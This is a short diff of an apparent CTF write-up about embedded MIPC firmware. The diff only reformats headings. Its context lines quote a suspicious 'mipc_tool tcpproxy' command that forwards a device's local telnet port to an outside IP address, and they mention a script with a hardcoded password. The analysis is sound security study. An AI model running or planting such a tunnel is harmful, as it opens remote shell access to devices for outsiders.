rjmendez/rjmendez.github.io/_posts/2019-02-18-Indeed_CTF_Embedded_3.md

 d3d9446802a44259755d38e6d163e820
 ```

-##Question and final exercise: What do these MPIC binaries do?
+## Question and final exercise: What do these MPIC binaries do?

-#WTF?
+# WTF Section

-##Question: What is the shell script with the hardcoded password for user 13510633251?
+## Question: What is the shell script with the hardcoded password for user 13510633251?
-##Question: What does this look like its doing?
+## Question: What does this look like its doing?
 ```
 mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file /tmp/tcp_notify.txt --keep-running enable --keep-alive 300000
 ```